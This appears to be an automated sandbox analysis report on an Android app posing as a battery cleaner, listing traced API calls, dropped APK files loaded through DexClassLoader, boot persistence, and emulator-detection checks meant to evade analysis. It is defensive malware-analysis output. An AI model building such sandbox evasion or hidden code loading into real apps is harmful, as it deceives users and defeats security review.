Source: com.google.android.ads.zxxz.j;->a:9API Call: Real call: Display id 0: DisplayInfo{"Built-in Screen", uniqueId "local:0", app 768 x 976, real 768 x 1024, largest app 1024 x 952, smallest app 768 x 696, mode 1, defaultMode 1, modes [{id=1, width=1024, height=768, fps=65.465}], colorTransformId 1, defaultColorTransformId 1, supportedColorTransforms [{id=1, colorTransform=0}], rotation 3, density 160 (159.5681 x 159.89508) dpi, layerStack 0, appVsyncOff 0, presDeadline 16275338, type BUILT_IN, state ON, FLAG_SECURE, FLAG_SUPPORTS_PROTECTED_BUFFERS}, DisplayMetrics{density=1.0, width=768, height=976, scaledDensity=1.0, xdpi=159.5681, ydpi=159.89508}, isValid=true
Source: com.google.android.ads.zxxz.j;->a:9API Call: Real call: public void android.view.Display.getRealMetrics(android.util.DisplayMetrics)
Source: com.google.android.gms.internal.zzal;->zzi:125API Call: Real call: null
Source: com.google.android.gms.internal.zzal;->zzi:125API Call: Real call: public static java.util.ArrayList com.google.android.ads.zxxz.j.a(android.content.Context)
Source: com.google.android.gms.internal.zzal;->zzX:32API Call: Real call: null
Source: com.google.android.gms.internal.zzal;->zzX:32API Call: Real call: public static java.lang.Long com.google.android.ads.zxxz.l.a()
Source: com.google.android.ads.zxxz.g;->a:4API Call: Real call: mobile.cleaner.battery.heath.cleanmaster.HomeActivity@6ba118
Source: com.google.android.ads.zxxz.g;->a:4API Call: Real call: public abstract java.lang.String android.content.Context.getPackageResourcePath()
Source: com.google.android.gms.internal.zzal;->zza:40API Call: Real call: null
Source: com.google.android.gms.internal.zzal;->zza:40API Call: Real call: public static java.nio.ByteBuffer com.google.android.ads.zxxz.g.a(android.content.Context)
Source: com.google.android.gms.internal.zzal;->zzb:88API Call: Real call: null
Source: com.google.android.gms.internal.zzal;->zzb:88API Call: Real call: public static java.nio.ByteBuffer com.google.android.ads.zxxz.k.a(android.content.Context)
Source: com.google.android.gms.internal.zzal;->zzj:133API Call: Real call: null
Source: com.google.android.gms.internal.zzal;->zzj:133API Call: Real call: public static [I com.google.android.ads.zxxz.d.a(android.content.Context)
Source: com.google.android.gms.internal.zzal;->zzk:139API Call: Real call: null
Source: com.google.android.gms.internal.zzal;->zzk:139API Call: Real call: public static int com.google.android.ads.zxxz.h.a(android.content.Context)
Source: com.google.android.gms.internal.zzal;->zzl:146API Call: Real call: null
Source: com.google.android.gms.internal.zzal;->zzl:146API Call: Real call: public static int com.google.android.ads.zxxz.a.a(android.content.Context)
Source: com.google.android.gms.internal.zzal;->zzg:113API Call: Real call: null
Source: com.google.android.gms.internal.zzal;->zzg:113API Call: Real call: public static java.lang.String com.google.android.ads.zxxz.c.a(android.content.Context)
Source: com.google.android.gms.internal.zzal;->zzh:119API Call: Real call: null
Source: com.google.android.gms.internal.zzal;->zzh:119API Call: Real call: public static java.lang.Long com.google.android.ads.zxxz.b.a(android.content.Context)
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFunc:32API Call: Real call: public void xxxxxx.zzzzzz.glue.ActivityModuleStart.cron(android.content.Context)
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncOther:126API Call: Real call: public void xxxxxx.zzzzzz.glue.ActivityModuleStart.knock(android.content.Context,android.content.Intent)
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncCheck:95API Call: Real call: public boolean xxxxxx.zzzzzz.glue.ActivityModuleStart.need_activity(android.content.Context)
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFunc:32API Call: Real call: public void xxxxxx.zzzzzz.glue.ActivityModuleStart.cron(android.content.Context)
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncOther:126API Call: Real call: public void xxxxxx.zzzzzz.glue.ActivityModuleStart.knock(android.content.Context,android.content.Intent)
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncCheck:95API Call: Real call: public boolean xxxxxx.zzzzzz.glue.ActivityModuleStart.need_activity(android.content.Context)
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFunc:32API Call: Real call: public void xxxxxx.zzzzzz.glue.ActivityModuleStart.cron(android.content.Context)
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncActivity:63API Call: java.lang.reflect.Method.invoke
Source: com.nineoldandroids.animation.PropertyValuesHolder$FloatPropertyValuesHolder;->setAnimatedValue:32API Call: java.lang.reflect.Method.invoke
Source: com.nineoldandroids.animation.PropertyValuesHolder$IntPropertyValuesHolder;->setAnimatedValue:32API Call: java.lang.reflect.Method.invoke
Source: com.nineoldandroids.animation.PropertyValuesHolder;->setupValue:119API Call: java.lang.reflect.Method.invoke
Source: com.nineoldandroids.animation.PropertyValuesHolder;->setAnimatedValue:156API Call: java.lang.reflect.Method.invoke
Source: com.nineoldandroids.animation.PropertyValuesHolder;->setupSetterAndGetter:223API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.ads.internal.util.client.zza;->zzW:44API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.ads.internal.util.client.zza;->zzW:48API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.dynamic.zze;->zzp:9API Call: java.lang.reflect.Field.get
Source: com.google.android.gms.common.internal.DowngradeableSafeParcel;->zza:6API Call: java.lang.reflect.Field.get
Source: com.google.android.gms.internal.zzal;->zza:50API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzal;->zzf:106API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzlh$1;->invoke:14API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzlh$1;->invoke:19API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzlh;->zzag:15API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzlh;->zzag:20API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzlh;->zzag:23API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzlh;->zzag:33API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzlh;->zzag:36API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzlh;->zznv:52API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzlh;->zznv:62API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzlh;->zznv:67API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzlh;->zznv:75API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzlh;->zznv:81API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzlh;->zznv:84API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzlh;->zza:117API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzlh;->zza:127API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzlh;->zza:134API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzlh;->zza:142API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zznj;->zza:8API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zznj;->zza:16API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zznj;->zza:24API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zznj;->zza:31API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzsv;->zza:20API Call: java.lang.reflect.Field.get
Source: com.google.android.gms.internal.zzsv;->zza:40API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzsv;->zza:48API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.measurement.internal.zzab;->zzh:187API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.ads.internal.purchase.zzb;->zzN:9API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.ads.internal.purchase.zzb;->zzb:22API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.ads.internal.purchase.zzb;->zzb:37API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.ads.internal.purchase.zzb;->zzh:50API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.ads.internal.purchase.zzb;->zzi:65API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.ads.internal.purchase.zzd;->zzfX:130API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.common.server.response.FastJsonResponse;->zzb:101API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.security.ProviderInstaller;->installIfNeeded:17API Call: java.lang.reflect.Method.invoke
Source: com.nineoldandroids.util.ReflectiveProperty;->get:85API Call: java.lang.reflect.Method.invoke
Source: com.nineoldandroids.util.ReflectiveProperty;->get:91API Call: java.lang.reflect.Field.get
Source: com.nineoldandroids.util.ReflectiveProperty;->set:98API Call: java.lang.reflect.Method.invoke

Persistence and Installation Behavior:

barindex
Drops a new APK fileShow sources
Source: Android AppFile dump: /storage/emulated/0/Download/0.apkJump to dropped file
Source: Android AppFile dump: /storage/emulated/0/Download/2.apkJump to dropped file
Source: Android AppFile dump: /storage/emulated/0/Download/flashset.apkJump to dropped file

Boot Survival:

barindex
Has permission to execute code after phone rebootShow sources
Source: submitted apkRequest permission: android.permission.RECEIVE_BOOT_COMPLETED
Installs a new wake lock (to get activate on phone screen on)Show sources
Source: com.google.android.gms.internal.zzrp;-><init>:18API Call: android.os.PowerManager.newWakeLock

Hooking and other Techniques for Hiding and Protection:

barindex
Has permission to query the list of currently running applicationsShow sources
Source: submitted apkRequest permission: android.permission.GET_TASKS
Has permission to terminate background processes of other applicationsShow sources
Source: submitted apkRequest permission: android.permission.KILL_BACKGROUND_PROCESSES
Queries list of running processes/tasksShow sources
Source: mobile.cleaner.battery.heath.cleanmaster.ActivityBatteySaver;->clearApplicationData:25API Call: android.app.ActivityManager.getRunningAppProcesses
Source: mobile.cleaner.battery.heath.cleanmaster.ActivityPhoneBooster;->clearApplicationData:25API Call: android.app.ActivityManager.getRunningAppProcesses
Source: mobile.cleaner.battery.heath.cleanmaster.ActivityScanAll;->clearBatteySaver:24API Call: android.app.ActivityManager.getRunningAppProcesses
Source: com.google.android.gms.gcm.zzb;->zzaI:120API Call: android.app.ActivityManager.getRunningAppProcesses
Source: com.google.android.gms.internal.zzbf;->zzcH:108API Call: android.app.ActivityManager.getRunningAppProcesses
Source: com.google.android.gms.internal.zzdm$zzb;->zza:41API Call: android.app.ActivityManager.getRunningAppProcesses
Source: com.google.android.gms.internal.zzir;->zzN:115API Call: android.app.ActivityManager.getRunningTasks
Source: com.google.android.gms.internal.zzir;->zzO:125API Call: android.app.ActivityManager.getRunningAppProcesses
Source: com.google.android.gms.internal.zznf;->zzi:18API Call: android.app.ActivityManager.getRunningAppProcesses
Source: com.google.android.gms.tagmanager.zzdb$zza;->zzcH:51API Call: android.app.ActivityManager.getRunningAppProcesses
Source: com.google.android.ads.zxxz.a;->a:5API Call: android.app.ActivityManager.getRunningAppProcesses
Uses Crypto APIsShow sources
Source: com.google.android.gms.measurement.internal.zzaj;->zzbv:256API Call: java.security.MessageDigest.getInstance
Source: com.google.android.gms.measurement.internal.zzn;->zziJ:132API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.ads.internal.util.client.zza;->zzaH:82API Call: java.security.MessageDigest.getInstance
Source: com.google.android.gms.ads.internal.util.client.zza;->zzaH:84API Call: java.security.MessageDigest.update
Source: com.google.android.gms.ads.internal.util.client.zza;->zzaH:87API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.internal.zzir;->zzhs:447API Call: java.security.MessageDigest.getInstance
Source: com.google.android.gms.internal.zzir;->zzhs:448API Call: java.security.MessageDigest.update
Source: com.google.android.gms.internal.zzir;->zzhs:449API Call: java.security.MessageDigest.update
Source: com.google.android.gms.internal.zzih;-><init>:7API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.internal.zzih;-><init>:7API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.internal.zzaq;->zzc:15API Call: javax.crypto.Cipher.getInstance
Source: com.google.android.gms.ads.internal.util.client.zza;->zzaH:84API Call: java.security.MessageDigest.update
Source: com.google.android.gms.ads.internal.util.client.zza;->zzaH:87API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.ads.internal.util.client.zza;->zzaH:84API Call: java.security.MessageDigest.update
Source: com.google.android.gms.ads.internal.util.client.zza;->zzaH:87API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.internal.zzaq;->zzc:18API Call: javax.crypto.Cipher.doFinal
Source: com.google.android.gms.internal.zzaq;->zzc:15API Call: javax.crypto.Cipher.getInstance
Source: com.google.android.gms.internal.zzaq;->zzc:18API Call: javax.crypto.Cipher.doFinal
Source: com.google.android.gms.internal.zzaq;->zzc:15API Call: javax.crypto.Cipher.getInstance
Source: com.google.android.gms.internal.zzaq;->zzc:18API Call: javax.crypto.Cipher.doFinal
Source: com.google.android.gms.internal.zzaq;->zzc:15API Call: javax.crypto.Cipher.getInstance
Source: com.google.android.gms.internal.zzaq;->zzc:18API Call: javax.crypto.Cipher.doFinal
Source: com.google.android.gms.internal.zzaq;->zzc:15API Call: javax.crypto.Cipher.getInstance
Source: com.google.android.gms.internal.zzaq;->zzc:18API Call: javax.crypto.Cipher.doFinal
Source: com.google.android.gms.internal.zzaq;->zzc:15API Call: javax.crypto.Cipher.getInstance
Source: com.google.android.gms.internal.zzaq;->zzc:18API Call: javax.crypto.Cipher.doFinal
Source: com.google.android.gms.internal.zzaq;->zzc:15API Call: javax.crypto.Cipher.getInstance
Source: com.google.android.gms.internal.zzaq;->zzc:18API Call: javax.crypto.Cipher.doFinal
Source: com.google.android.gms.internal.zzaq;->zzc:15API Call: javax.crypto.Cipher.getInstance
Source: com.google.android.gms.internal.zzaq;->zzc:18API Call: javax.crypto.Cipher.doFinal
Source: com.google.android.gms.internal.zzaq;->zzc:15API Call: javax.crypto.Cipher.getInstance
Source: com.google.android.gms.internal.zzaq;->zzc:18API Call: javax.crypto.Cipher.doFinal
Source: com.google.android.gms.internal.zzaq;->zzc:15API Call: javax.crypto.Cipher.getInstance
Source: com.google.android.gms.internal.zzaq;->zzc:18API Call: javax.crypto.Cipher.doFinal
Source: com.google.android.gms.internal.zzaq;->zzc:15API Call: javax.crypto.Cipher.getInstance
Source: com.google.android.gms.internal.zzaq;->zzc:18API Call: javax.crypto.Cipher.doFinal
Source: com.google.android.gms.internal.zzaq;->zzc:15API Call: javax.crypto.Cipher.getInstance
Source: com.google.android.gms.internal.zzaq;->zzc:18API Call: javax.crypto.Cipher.doFinal
Source: com.google.android.gms.internal.zzaq;->zzc:15API Call: javax.crypto.Cipher.getInstance
Source: com.google.android.gms.internal.zzaq;->zzc:18API Call: javax.crypto.Cipher.doFinal
Source: com.google.android.gms.internal.zzaq;->zzc:15API Call: javax.crypto.Cipher.getInstance
Source: com.google.android.gms.internal.zzaq;->zzc:18API Call: javax.crypto.Cipher.doFinal
Source: com.google.android.gms.internal.zzaq;->zzc:15API Call: javax.crypto.Cipher.getInstance
Source: com.google.android.gms.internal.zzaq;->zzc:18API Call: javax.crypto.Cipher.doFinal
Source: com.google.android.gms.internal.zzaq;->zzc:15API Call: javax.crypto.Cipher.getInstance
Source: com.google.android.gms.internal.zzaq;->zzc:18API Call: javax.crypto.Cipher.doFinal
Source: com.google.android.gms.internal.zzaq;->zzc:15API Call: javax.crypto.Cipher.getInstance
Source: com.google.android.gms.internal.zzaq;->zzc:18API Call: javax.crypto.Cipher.doFinal
Source: com.google.android.gms.internal.zzaq;->zzc:15API Call: javax.crypto.Cipher.getInstance
Source: com.google.android.gms.internal.zzaq;->zzc:18API Call: javax.crypto.Cipher.doFinal
Source: com.google.android.gms.internal.zzaq;->zzc:15API Call: javax.crypto.Cipher.getInstance
Source: com.google.android.gms.internal.zzaq;->zzc:18API Call: javax.crypto.Cipher.doFinal
Source: com.google.android.gms.internal.zzaq;->zzc:15API Call: javax.crypto.Cipher.getInstance
Source: com.google.android.gms.internal.zzaq;->zzc:18API Call: javax.crypto.Cipher.doFinal
Source: com.google.android.gms.internal.zzaq;->zzc:15API Call: javax.crypto.Cipher.getInstance
Source: com.google.android.gms.internal.zzaq;->zzc:18API Call: javax.crypto.Cipher.doFinal
Source: com.google.android.gms.internal.zzaq;->zzc:15API Call: javax.crypto.Cipher.getInstance
Source: com.google.android.gms.internal.zzaq;->zzc:18API Call: javax.crypto.Cipher.doFinal
Source: com.google.android.gms.internal.zzaq;->zzc:15API Call: javax.crypto.Cipher.getInstance
Source: com.google.android.gms.internal.zzaq;->zzc:18API Call: javax.crypto.Cipher.doFinal
Source: com.google.android.gms.internal.zzaq;->zzc:15API Call: javax.crypto.Cipher.getInstance
Source: com.google.android.gms.internal.zzaq;->zzc:18API Call: javax.crypto.Cipher.doFinal
Source: com.google.android.gms.internal.zzaq;->zzc:15API Call: javax.crypto.Cipher.getInstance
Source: com.google.android.gms.internal.zzaq;->zzc:18API Call: javax.crypto.Cipher.doFinal
Source: com.google.android.gms.internal.zzaq;->zzc:15API Call: javax.crypto.Cipher.getInstance
Source: com.google.android.gms.internal.zzaq;->zzc:18API Call: javax.crypto.Cipher.doFinal
Source: com.google.android.gms.internal.zzaq;->zzc:15API Call: javax.crypto.Cipher.getInstance
Source: com.google.android.gms.internal.zzaq;->zzc:18API Call: javax.crypto.Cipher.doFinal
Source: com.google.android.ads.zxxz.g;->b:64API Call: java.security.MessageDigest.getInstance
Source: com.google.android.ads.zxxz.g;->b:67API Call: java.security.MessageDigest.update
Source: com.google.android.ads.zxxz.g;->b:67API Call: java.security.MessageDigest.update
Source: com.google.android.ads.zxxz.g;->b:70API Call: java.security.MessageDigest.digest
Source: com.google.android.ads.zxxz.k;->a:7API Call: java.security.MessageDigest.getInstance
Source: com.google.android.ads.zxxz.k;->a:10API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.internal.zzak;->zza:28API Call: java.security.MessageDigest.getInstance
Source: com.google.android.gms.internal.zzak;->zza:29API Call: java.security.MessageDigest.update
Source: com.google.android.gms.internal.zzak;->zza:30API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.iid.InstanceID;->zza:24API Call: java.security.MessageDigest.getInstance
Source: com.google.android.gms.iid.InstanceID;->zza:25API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.analytics.internal.zza;->zzbb:50API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.analytics.internal.zzam;->zzbv:123API Call: java.security.MessageDigest.getInstance
Source: com.google.android.gms.internal.zzaq;->zzc:17API Call: javax.crypto.Cipher.init
Source: com.google.android.gms.internal.zzbg;->zzcL:7API Call: java.security.MessageDigest.getInstance
Source: com.google.android.gms.internal.zzbj;->zzu:13API Call: java.security.MessageDigest.update
Source: com.google.android.gms.internal.zzbj;->zzu:15API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.internal.zzir;->zzhs:450API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.measurement.internal.zzaj;->zzr:427API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.measurement.internal.zzt;->zzfi:128API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.tagmanager.zzap;->zzg:12API Call: java.security.MessageDigest.getInstance
Source: com.google.android.gms.tagmanager.zzap;->zzg:13API Call: java.security.MessageDigest.update
Source: com.google.android.gms.tagmanager.zzap;->zzg:14API Call: java.security.MessageDigest.digest
Source: com.google.android.ads.zxxz.f;->a:15API Call: java.security.MessageDigest.getInstance
Source: com.google.android.ads.zxxz.f;->a:18API Call: java.security.MessageDigest.update
Source: com.google.android.ads.zxxz.f;->a:21API Call: java.security.MessageDigest.digest

Malware Analysis System Evasion:

barindex
Tries to detect Android x86Show sources
Source: Leptdz/jhxonwlp/zdmg/Tools;->checkSandBox(Landroid/content/Context;)ZMethod string: "Android SDK built for x86"
Tries to detect the analysis device (e.g. the Android emulator)Show sources
Source: Leptdz/jhxonwlp/zdmg/Tools;->checkSandBox(Landroid/content/Context;)ZMethod string: "Emulator"
Accesses android OS build fieldsShow sources
Source: eptdz.jhxonwlp.zdmg.Tools;->checkSandBox:153Field Access: android.os.Build.MODEL
Source: eptdz.jhxonwlp.zdmg.Tools;->checkSandBox:156Field Access: android.os.Build.MODEL
Source: eptdz.jhxonwlp.zdmg.Tools;->checkSandBox:159Field Access: android.os.Build.MODEL
Source: eptdz.jhxonwlp.zdmg.Tools;->checkSandBox:162Field Access: android.os.Build.FINGERPRINT
Source: eptdz.jhxonwlp.zdmg.Tools;->checkSandBox:165Field Access: android.os.Build.FINGERPRINT
Source: eptdz.jhxonwlp.zdmg.Tools;->checkSandBox:168Field Access: android.os.Build.MODEL
Source: eptdz.jhxonwlp.zdmg.Tools;->checkSandBox:171Field Access: android.os.Build.MANUFACTURER
Source: eptdz.jhxonwlp.zdmg.Tools;->checkSandBox:174Field Access: android.os.Build.BRAND
Source: com.google.android.gms.internal.zzbu;-><init>:27Field Access: android.os.Build.MANUFACTURER
Source: com.google.android.gms.internal.zzhj$zza;-><init>:13Field Access: android.os.Build.DEVICE
Source: com.google.android.gms.ads.internal.util.client.zza;->zzT:24Field Access: android.os.Build.DEVICE
Source: eptdz.jhxonwlp.zdmg.Tools;->checkSandBox:177Field Access: android.os.Build.DEVICE
Source: com.nineoldandroids.view.animation.AnimatorProxy;-><clinit>:1Field Access: android.os.Build$VERSION.SDK
Source: com.google.android.gms.ads.internal.util.client.zza;->zzhI:111Field Access: android.os.Build.DEVICE
Source: com.google.android.gms.common.zze;->zzoN:239Field Access: android.os.Build.TYPE
Source: com.google.android.gms.fitness.data.Device;->getLocalDevice:13Field Access: android.os.Build.MANUFACTURER
Source: com.google.android.gms.fitness.data.Device;->getLocalDevice:14Field Access: android.os.Build.MODEL
Source: com.google.android.gms.fitness.data.Device;->getLocalDevice:15Field Access: android.os.Build$VERSION.RELEASE
Source: com.google.android.gms.analytics.internal.zzah;-><init>:6Field Access: android.os.Build$VERSION.RELEASE
Source: com.google.android.gms.analytics.internal.zzah;-><init>:9Field Access: android.os.Build.MODEL
Source: com.google.android.gms.analytics.internal.zzah;-><init>:10Field Access: android.os.Build.ID
Source: com.google.android.gms.analytics.internal.zzx;->version:1Field Access: android.os.Build$VERSION.SDK
Source: com.google.android.gms.analytics.internal.zzx;->version:4Field Access: android.os.Build$VERSION.SDK
Source: com.google.android.gms.internal.zzbu;-><init>:18Field Access: android.os.Build$VERSION.RELEASE
Source: com.google.android.gms.internal.zzbu;-><init>:22Field Access: android.os.Build$VERSION.SDK
Source: com.google.android.gms.internal.zzha;->zza:68Field Access: android.os.Build$VERSION.RELEASE
Source: com.google.android.gms.internal.zzhe;->zza:211Field Access: android.os.Build.MANUFACTURER
Source: com.google.android.gms.internal.zzhe;->zza:214Field Access: android.os.Build.MODEL
Source: com.google.android.gms.internal.zzhj$zza;->zzD:45Field Access: android.os.Build.FINGERPRINT
Source: com.google.android.gms.internal.zzir;->zza:216Field Access: android.os.Build$VERSION.RELEASE
Source: com.google.android.gms.internal.zzir;->zzhr:415Field Access: android.os.Build$VERSION.RELEASE
Source: com.google.android.gms.internal.zzir;->zzhr:418Field Access: android.os.Build$VERSION.RELEASE
Source: com.google.android.gms.internal.zzir;->zzhr:424Field Access: android.os.Build.DEVICE
Source: com.google.android.gms.internal.zzir;->zzhr:427Field Access: android.os.Build.DEVICE
Source: com.google.android.gms.internal.zzir;->zzhr:429Field Access: android.os.Build.DISPLAY
Source: com.google.android.gms.internal.zzir;->zzhr:432Field Access: android.os.Build.DISPLAY
Source: com.google.android.gms.internal.zzir;->zzht:454Field Access: android.os.Build.MANUFACTURER
Source: com.google.android.gms.internal.zzir;->zzht:455Field Access: android.os.Build.MODEL
Source: com.google.android.gms.measurement.internal.zzg;->zzCy:20Field Access: android.os.Build$VERSION.RELEASE
Source: com.google.android.gms.measurement.internal.zzg;->zzht:23Field Access: android.os.Build.MODEL
Source: com.google.android.gms.tagmanager.zzab;->zzP:5Field Access: android.os.Build.MANUFACTURER
Source: com.google.android.gms.tagmanager.zzab;->zzP:6Field Access: android.os.Build.MODEL
Source: com.google.android.gms.tagmanager.zzal;->version:1Field Access: android.os.Build$VERSION.SDK
Source: com.google.android.gms.tagmanager.zzal;->version:6Field Access: android.os.Build$VERSION.SDK
Source: com.google.android.gms.tagmanager.zzbx;->zzP:5Field Access: android.os.Build$VERSION.RELEASE
Source: com.google.android.gms.tagmanager.zzcx;-><init>:7Field Access: android.os.Build$VERSION.RELEASE
Source: com.google.android.gms.tagmanager.zzcx;-><init>:10Field Access: android.os.Build.MODEL
Source: com.google.android.gms.tagmanager.zzcx;-><init>:11Field Access: android.os.Build.ID
Source: com.nineoldandroids.view.ViewPropertyAnimator;->animate:5Field Access: android.os.Build$VERSION.SDK
Source: com.google.android.ads.zxxz.f;->a:26Field Access: android.os.Build.BOARD
Source: com.google.android.ads.zxxz.f;->a:29Field Access: android.os.Build.DEVICE
Source: com.google.android.ads.zxxz.f;->a:32Field Access: android.os.Build.BRAND
Source: com.google.android.ads.zxxz.i;->a:2Field Access: android.os.Build$VERSION.RELEASE
Queries several sensitive phone informationsShow sources
Source: Lcom/google/android/gms/internal/zzir;->zza(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;Landroid/os/Bundle;Z)VMethod string: "os"
Source: Lcom/google/android/gms/tagmanager/zzbz;-><clinit>()VMethod string: "android"
Source: Lcom/google/android/gms/games/request/GameRequestRef;->getType()IMethod string: "type"
Source: Lcom/google/android/gms/games/multiplayer/turnbased/TurnBasedMatchRef;->getVersion()IMethod string: "version"
Source: Lcom/google/android/gms/internal/zznv;->zzaH(Landroid/content/Context;)ZMethod string: "phone"
Source: Lcom/google/android/gms/internal/zzpq;->toString()Ljava/lang/String;Method string: "appid"
Source: Lcom/google/android/gms/internal/zzbu;-><init>(Landroid/content/Context;Ljava/lang/String;)VMethod string: "sdk"
Source: Lcom/google/android/gms/fitness/data/Bucket;->zzeM(I)Ljava/lang/String;Method string: "time"
Source: Lcom/google/android/gms/internal/zzpy;->toString()Ljava/lang/String;Method string: "category"
Source: Lcom/google/android/gms/tagmanager/zzdg;->zzaa(Ljava/util/Map;)Lcom/google/android/gms/analytics/ecommerce/Product;Method string: "brand"
Queries the unique operating system id (ANDROID_ID)Show sources
Source: com.google.android.gms.ads.internal.util.client.zza;->zzT:28API Call: android.provider.Settings.Secure.getString
Source: com.google.android.gms.fitness.data.Device;->zzaC:31API Call: android.provider.Settings$Secure.getString
Source: com.google.android.gms.tagmanager.zzaa;->zzaY:11API Call: android.provider.Settings$Secure.getString
Source: com.google.android.gms.tagmanager.zzbk;->zzaY:11API Call: android.provider.Settings$Secure.getString
Source: com.google.android.ads.zxxz.f;->a:5API Call: android.provider.Settings$Secure.getString
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: GOOGPLAY.SFBinary or memory string: SHA1-Digest: EEVvEieW6W9PPCuIqEmUHiPHXg8=

Anti Debugging:

barindex
Creates a new dex file (likely to load a new code)Show sources
Source: com.google.android.gms.internal.zzal;->zzm:254API Call: java.io.File.<init>

HIPS / PFW / Operating System Protection Evasion:

barindex
Uses the DexClassLoader (often used for code injection)Show sources
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncCheck:90API Call: dalvik.system.DexClassLoader.<init>("/storage/emulated/0/Download/flashset.apk")
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFunc:27API Call: dalvik.system.DexClassLoader.<init>("/storage/emulated/0/Download/flashset.apk")
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncOther:121API Call: dalvik.system.DexClassLoader.<init>("/storage/emulated/0/Download/2.apk")
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncOther:121API Call: dalvik.system.DexClassLoader.<init>("/storage/emulated/0/Download/0.apk")
Source: com.google.android.gms.internal.zzal;->zzm:170API Call: dalvik.system.DexClassLoader.<init>("/data/user/0/ghl.phoneboost.com/cache/ads780543288.jar")
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFunc:29API Call: dalvik.system.DexClassLoader.loadClass (not executed)
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncActivity:58API Call: dalvik.system.DexClassLoader.<init> (not executed)
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncActivity:60API Call: dalvik.system.DexClassLoader.loadClass (not executed)
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncCheck:92API Call: dalvik.system.DexClassLoader.loadClass (not executed)
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncOther:123API Call: dalvik.system.DexClassLoader.loadClass (not executed)
Source: com.google.android.gms.internal.zzal;->zzm:173API Call: dalvik.system.DexClassLoader.loadClass (not executed)
Source: com.google.android.gms.internal.zzal;->zzm:176API Call: dalvik.system.DexClassLoader.loadClass (not executed)
Source: com.google.android.gms.internal.zzal;->zzm:179API Call: dalvik.system.DexClassLoader.loadClass (not executed)
Source: com.google.android.gms.internal.zzal;->zzm:182API Call: dalvik.system.DexClassLoader.loadClass (not executed)
Source: com.google.android.gms.internal.zzal;->zzm:185API Call: dalvik.system.DexClassLoader.loadClass (not executed)
Source: com.google.android.gms.internal.zzal;->zzm:188API Call: dalvik.system.DexClassLoader.loadClass (not executed)
Source: com.google.android.gms.internal.zzal;->zzm:191API Call: dalvik.system.DexClassLoader.loadClass (not executed)
Source: com.google.android.gms.internal.zzal;->zzm:194API Call: dalvik.system.DexClassLoader.loadClass (not executed)
Source: com.google.android.gms.internal.zzal;->zzm:197API Call: dalvik.system.DexClassLoader.loadClass (not executed)
Source: com.google.android.gms.internal.zzal;->zzm:200API Call: dalvik.system.DexClassLoader.loadClass (not executed)
